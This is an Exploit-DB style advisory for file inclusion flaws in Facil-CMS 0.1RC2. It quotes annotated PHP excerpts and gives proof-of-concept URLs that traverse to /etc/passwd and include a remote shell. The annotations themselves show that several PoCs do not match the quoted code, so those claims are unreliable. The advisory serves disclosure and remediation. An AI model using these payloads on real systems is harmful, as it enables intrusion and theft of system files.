Facil-CMS 0.1RC2 - Local/Remote File Inclusion

EDB-ID:

12061




Platform:

PHP

Date:

2010-04-04


########################################################
	Facil-CMS (LFI/RFI) Vulnerability
########################################################
[+]Title	:	Facil-CMS Multiple Vulnerabilities
[+]Version:	0.1RC2 
[+]Download:	http://sourceforge.net/projects/facil-cms/files/
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com		

	[!]Thank`s To: all friends

########################################################

	-=[ Vuln C0de ]=-
***********************
[-]facil-cms/index.php

 // Excerpt from facil-cms/index.php: loads the settings file, then includes
 // config.php and class/index.php of the module named by $config->getSiteIndex().
 require_once('config.inc.php');
 require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
 
 $config = new facilConfig();
 $utils = new facilUtils();
 
 // is_module() is the only check applied to the module name before it is used;
 // neither is_module() nor getSiteIndex() is shown in this excerpt.
 // NOTE(review): getSiteIndex() is a facilConfig accessor. Nothing quoted here shows
 // it returning request data; confirm in facilConfig before treating the value as
 // attacker-controlled.
 if($utils->is_module($config->getSiteIndex()))

// NOTE(review): lines appear to be elided at this point. As quoted, the brace-less
// if above would guard only the first require_once below.
// The module name is concatenated unmodified into both include paths.
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/config.php');
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/class/index.php');

***********************
[-]facil-cms/modules.php

// Excerpt from facil-cms/modules.php, quoted with lines elided (the braces below do
// not balance). It reads the module, admin-module and file names from POST fields
// and includes the selected module's config.php and class/index.php.
require_once('config.inc.php');
 require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');

 // modload is read from the POST body and accepted only when it contains no "/".
 // eregi() was deprecated in PHP 5.3.0 and removed in PHP 7.0.0.
 // NOTE(review): rejecting a single character is a deny-list; the name should be
 // matched against an allow-list of installed module directories instead.
 if($_POST['modload'] && !eregi("/", $_POST['modload']))
 {
 	$_MODLOAD = trim($_POST['modload']);
 	// fileload gets the same "/" rejection as modload.
 	if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
 	{
 		$FILELOAD = trim($_POST['fileload']);

 	// presumably the else branch (elided): both names are reset when a check fails.
 	$_MODLOAD = false;
 	$FILELOAD = false;

 // Same pattern for the admin module name.
 if($_POST['admload'] &&  !eregi("/", $_POST['admload']))
 {
 	$_ADMLOAD = trim($_POST['admload']);
 	if($_POST['fileload'] && !eregi("/", $_POST['fileload']))


 	// presumably the else branch (elided), as above.
 	$_ADMLOAD = false;
 	$FILELOAD = false;

	// $_MODLOAD is concatenated into both include paths; the only validation shown
	// in this excerpt is the "/" rejection and trim() above.
	require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/config.php');
	require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/class/index.php');

*******************

[-]facil-cms/includes/facil-settings.php

// Excerpt from facil-cms/includes/facil-settings.php: defaults the session language
// from the configuration, then includes the language file and the theme class.
if(!isset($_SESSION['FACIL_LANGUAGE']))
 {
 	$_SESSION['FACIL_LANGUAGE'] = $config->getLanguage();
 }
 
 // Both include paths are built from session values with no validation in this
 // excerpt. Where $_SESSION['FACIL_THEME'] is assigned is not shown here.
 // NOTE(review): the session values should be checked against an allow-list of
 // installed languages and themes before being used in a path.
 require_once(_FACIL_I18N_PATH_ . '/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
 require_once(_FACIL_THEMES_PATH_ . '/' . $_SESSION['FACIL_THEME'] . '/themeFacil.class.php');

*******************

	-=[ Proof Of Concept ]=-

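	http://127.0.0.1/facil-cms/modules.php?modload=../../../../../../../../etc/passwd%00
	[!]Note: the modules.php excerpt above takes modload from $_POST and rejects any value containing "/", so this request does not correspond to the quoted code path as shown. The trailing %00 relies on null-byte path truncation, which PHP rejects from 5.3.4 onward.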
	Similar reference:
	http://www.exploit-db.com/exploits/5792

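	http://127.0.0.1/facil-cms/index.php?getSiteIndex=../../../../../../../../etc/passwd%00
	[!]Note: in the index.php excerpt above getSiteIndex() is a method of facilConfig, not a request parameter; the excerpt does not show request input reaching it, and the value also passes through is_module() first.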

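	http://127.0.0.1/facil-cms//includes/facil-settings.php?FACIL_THEME= [rfi shell]
	[!]Note: the facil-settings.php excerpt above reads FACIL_THEME from $_SESSION; how a query-string value would reach it is not shown. Remote inclusion additionally requires allow_url_include to be enabled (it is off by default). Fix: resolve module, theme and language names against an allow-list of installed directories before building any include path.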

########################################################